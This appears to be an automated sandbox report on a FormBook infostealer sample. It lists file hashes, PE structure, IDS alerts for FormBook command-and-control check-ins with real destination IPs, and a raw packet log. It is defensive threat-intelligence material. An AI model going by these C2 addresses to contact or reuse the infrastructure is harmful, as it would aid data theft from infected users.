                                                  Classification: mal100.troj.spyw.evad.winEXE@11/5@16/14
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 90%
                                                  • Number of executed functions: 90
                                                  • Number of non-executed functions: 277
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: 8hd98EhtIFcYkb8.exe
                                                  Time | Type | Description
                                                  13:23:02 | API Interceptor | 1x Sleep call for process: 8hd98EhtIFcYkb8.exe modified
                                                  15:05:14 | API Interceptor | 10652050x Sleep call for process: chkntfs.exe modified
                                                  15:07:23 | API Interceptor | 13x Sleep call for process: aj34fjqh.exe modified
                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  Process:C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1500
                                                  Entropy (8bit):5.345358309061185
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHQ
                                                  MD5:215B3562F83C4FB9BBB129D2F9E59ADA
                                                  SHA1:0534A53F6F42ECA7E56EB02E328A2025254AC511
                                                  SHA-256:4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
                                                  SHA-512:E09A97CE89258E1BCDA4832E1348720EBCD462E0C81736CCAD8D99AB1AC60ECBAF5E1F552C4F0977F498D25E27739197D2A9C1EFFDEB7116020D106231EB7C43
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                  Process:C:\Windows\SysWOW64\chkntfs.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):698880
                                                  Entropy (8bit):7.911230439704249
                                                  Encrypted:false
                                                  SSDEEP:12288:199glhtybCaw7zjHIWpMnAzN0D5qZboic6R+cye27TXFzLH0Z:19w3DXMKKqZbtRDyzXRL
                                                  MD5:A000A790579BE8EDD044A668469EA33E
                                                  SHA1:CA2DB74AAABF250A375010E9039CBAA85BFA0074
                                                  SHA-256:CB0C396BC52A0550F80BCC4EA4930DD07D1A308CB8FE4A9200F92C06B7E71EAA
                                                  SHA-512:952CCD18E119068271A4D67A08D36C922C35D0FD51678C63B45F021C534A82521A99B2AB6CFA33D36839449DB6934DFBD3BA88C0968D229CE0E5B526A1469F99
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Process:C:\Windows\SysWOW64\chkntfs.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:modified
                                                  Size (bytes):698880
                                                  Entropy (8bit):7.911230439704249
                                                  Encrypted:false
                                                  SSDEEP:12288:199glhtybCaw7zjHIWpMnAzN0D5qZboic6R+cye27TXFzLH0Z:19w3DXMKKqZbtRDyzXRL
                                                  MD5:A000A790579BE8EDD044A668469EA33E
                                                  SHA1:CA2DB74AAABF250A375010E9039CBAA85BFA0074
                                                  SHA-256:CB0C396BC52A0550F80BCC4EA4930DD07D1A308CB8FE4A9200F92C06B7E71EAA
                                                  SHA-512:952CCD18E119068271A4D67A08D36C922C35D0FD51678C63B45F021C534A82521A99B2AB6CFA33D36839449DB6934DFBD3BA88C0968D229CE0E5B526A1469F99
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Process:C:\Windows\SysWOW64\chkntfs.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1215420383712111
                                                  Encrypted:false
                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.9490261556051545
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  File name:8hd98EhtIFcYkb8.exe
                                                  File size:686'080 bytes
                                                  MD5:677b2d2d3a54e0c1d8e416b276093fb3
                                                  SHA1:22b6aa9e97cf16d55aa16dcc20fea67f9806d09c
                                                  SHA256:c42f31c68ee4a14aec74ddce249314d00813289dc36740484b09ceadf72aa0f8
                                                  SHA512:43dba02ce5e096eaf44a6a623737b89a8d89e98995b7bdfa7f17a8e4f0e93417c0a63c4a066f760a1c762e5d058461bf4af6d31c949b7d5bf2f4d7b750921945
                                                  SSDEEP:12288:Efqy6lRPMqNMCXnIfd8SLLov+I6rDqAgdf3Gqsrj0Tfh3PFvwxgpNQKA5Go5tdZ:oIRVV3e7LI6vQMj0Tfh26NQco5td
                                                  TLSH:FDE422A032386567CBBDAAF54429250517F265AA1C02FBCD0DD120CF4EDAF511E21BBB
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..P... .......o... ........@.. ....................................@................................
                                                  Icon Hash:6145b2b1e4a4b186
                                                  Entrypoint:0x4a6f8e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6682B3A3 [Mon Jul 1 13:48:19 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa6f3c | 0x4f | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa8000 | 0x16b4 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xaa000 | 0xc | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x2000 | 0xa4f94 | 0xa5000 | 3bfe6521eaaf36ce8403db72969bafda | False | 0.952047821969697 | data | 7.968066969388496 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0xa8000 | 0x16b4 | 0x1800 | 432891cdc11b1dfbccff772b61a11647 | False | 0.8050130208333334 | data | 7.037788378482379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0xaa000 | 0xc | 0x800 | 06acc8b2d6f8a370378fd25813a22048 | False | 0.015625 | data | 0.03037337037012526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_ICON | 0xa80c8 | 0x129f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9418921753723516
                                                  RT_GROUP_ICON | 0xa9378 | 0x14 | data | | | 1.05
                                                  RT_VERSION | 0xa939c | 0x312 | data | | | 0.43638676844783714
                                                  DLL | Import
                                                  mscoree.dll | _CorExeMain
                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                  07/01/24-19:25:38.686378 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64475 | 80 | 192.168.2.7 | 192.250.231.28
                                                  07/01/24-19:25:25.124461 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64471 | 80 | 192.168.2.7 | 74.208.236.162
                                                  07/01/24-19:27:00.696487 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64496 | 80 | 192.168.2.7 | 38.207.19.49
                                                  07/01/24-19:26:19.230746 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64484 | 80 | 192.168.2.7 | 43.198.80.127
                                                  07/01/24-19:24:15.086308 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64459 | 80 | 192.168.2.7 | 172.67.194.145
                                                  07/01/24-19:25:11.804732 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64467 | 80 | 192.168.2.7 | 46.30.215.51
                                                  07/01/24-19:26:00.592496 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64479 | 80 | 192.168.2.7 | 162.0.238.43
                                                  07/01/24-19:26:46.825321 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64492 | 80 | 192.168.2.7 | 91.195.240.123
                                                  07/01/24-19:24:37.172413 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64463 | 80 | 192.168.2.7 | 38.55.194.30
                                                  07/01/24-19:23:35.528269 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49712 | 80 | 192.168.2.7 | 217.160.0.31
                                                  07/01/24-19:26:33.240207 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 64488 | 80 | 192.168.2.7 | 45.130.41.249
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Jul 1, 2024 19:24:14.060456038 CEST6445880192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.079236031 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.084331036 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.084522009 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.086308002 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.091320038 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787378073 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787462950 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787591934 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787642956 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.788394928 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.791934967 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.796886921 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:29.461313009 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:29.468151093 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:29.470961094 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:29.472742081 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:29.479617119 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:30.982315063 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:31.034789085 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:32.002028942 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:32.007523060 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:32.007632017 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:32.010243893 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:32.019553900 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:33.513750076 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:33.558654070 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:34.531841040 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:34.630631924 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:34.634516001 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:34.636476994 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:34.641371965 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:34.641544104 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:36.138555050 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:36.186701059 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:37.160430908 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:37.165349960 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:37.168514967 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:37.172413111 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:37.177685022 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:50.860143900 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:50.860532999 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.125679970 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.125736952 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.126128912 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.126178980 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.126626968 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.126682043 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.132226944 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.132237911 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:56.056518078 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:56.056569099 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:58.582581043 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:58.583019972 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:58.583889961 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:58.588865995 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:25:03.776302099 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:03.781223059 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:03.781305075 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:03.784488916 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:03.789437056 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:04.413290977 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:04.413851976 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:04.420448065 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:05.294903040 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.320223093 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.534404039 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:06.538366079 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.538366079 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.545190096 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:07.172175884 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:07.172501087 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:07.176574945 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:08.045144081 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:09.064511061 CEST6446680192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:09.069869041 CEST806446646.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:09.072560072 CEST6446680192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:09.076472044 CEST6446680192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:09.081309080 CEST806446646.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:09.081723928 CEST806446646.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:09.798964977 CEST806446646.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:09.799242973 CEST806446646.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:09.799290895 CEST6446680192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:10.576450109 CEST6446680192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:11.595480919 CEST6446780192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:11.802278996 CEST806446746.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:11.802381039 CEST6446780192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:11.804732084 CEST6446780192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:11.809669018 CEST806446746.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:12.455271006 CEST806446746.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:12.457247019 CEST806446746.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:12.460279942 CEST6446780192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:12.460279942 CEST6446780192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:12.465734005 CEST806446746.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:17.491786003 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:17.496757984 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:17.496841908 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:17.499043941 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:17.504302979 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313036919 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313054085 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313065052 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313076973 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313119888 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313133001 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313134909 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:18.313150883 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313163042 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313179016 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313188076 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:18.313209057 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:18.313215017 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.313276052 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:18.320240974 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.320255041 CEST806446874.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:18.326176882 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:19.013739109 CEST6446880192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.032980919 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.038096905 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.038186073 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.040369034 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.046020985 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869039059 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869061947 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869074106 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869086981 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869098902 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869111061 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869122982 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869134903 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869128942 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.869148016 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869163036 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.869179964 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.869179964 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.869227886 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:20.873969078 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.873984098 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.873997927 CEST806446974.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:20.874133110 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:21.544991016 CEST6446980192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:22.566678047 CEST6447080192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:22.571872950 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:22.576325893 CEST6447080192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:22.578505993 CEST6447080192.168.2.774.208.236.162
                                                  Jul 1, 2024 19:25:22.583334923 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:22.583857059 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369860888 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369887114 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369898081 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369946957 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369959116 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369968891 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.369982004 CEST806447074.208.236.162192.168.2.7
                                                  Jul 1, 2024 19:25:23.370003939 CEST6447080192.168.2.774.208.236.162
